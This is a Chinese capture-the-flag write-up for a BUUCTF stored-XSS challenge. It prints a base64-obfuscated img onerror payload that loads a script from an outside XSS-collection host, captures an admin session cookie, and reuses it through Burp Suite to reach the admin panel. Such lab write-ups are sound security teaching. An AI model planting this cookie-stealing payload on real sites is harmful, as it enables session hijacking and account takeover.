【BUUCTF】BUU XSS COURSE 11

进入题目页面如下,有吐槽和登录两个可注入点

根据题目可知是一道XSS

登陆界面没有注册,尝试简单的SQL注入也不行

回到吐槽界面,输入简单的xss代码

<script>alert(1)</script>

访问网址,发现回显不出来,猜测是存储型xss,通过吐槽功能插入xss代码,获取cookie登录后台

可以使用下面这个平台,创建项目

​​​​​​XSS安全平台

复制代码
'"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWouY2kvZXplIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== onerror=eval(atob(this.id))>

获取到了 cookie : PHPSESSID=37fe83cc4c3fe53c0686b2029c4cab43

后台路径 http://web/backend/admin.php

根据提示构造url并访问

4276ae11-be9b-4384-bfae-75839de9d1b2.node5.buuoj.cn:81/backend/admin.php

还没改cookie qyq

在burp suite中改cookie值并放行

再次访问,最终得到flag

相关推荐
X7x511 小时前
可信计算架构:数字时代的安全基石
网络安全·网络攻击模型·安全威胁分析·安全架构·可信计算架构
YangYang9YangYan11 小时前
民办本科大数据专业学习数据分析的价值分析
大数据·学习·数据分析
brave_zhao11 小时前
head方法可以用于http url嗅探吗
学习
库奇噜啦呼11 小时前
【iOS】源码学习-YYModel源码学习
学习·ios·cocoa
伶俜6612 小时前
# [特殊字符] 零基础学 ArkUI 手势(专题五):从点击到多指触控,一网打尽 6 种手势
学习·华为·harmonyos
安全指北针12 小时前
AI检测 vs 传统SIEM:2026年安全运营效率实测对比
人工智能·安全
余防12 小时前
app安全测试-服务端
安全·web app
辰海Coding12 小时前
MiniSpring框架学习笔记-JDBC 访问框架:如何抽取 JDBC 模板并隔离数据库?
java·数据库·笔记·学习·spring
神明不懂浪漫12 小时前
【第二章】HTML2——表格、表单标签
开发语言·经验分享·笔记·html
十月的皮皮12 小时前
C语言学习笔记20260609-字符串反转两种实现方法
c语言·笔记·学习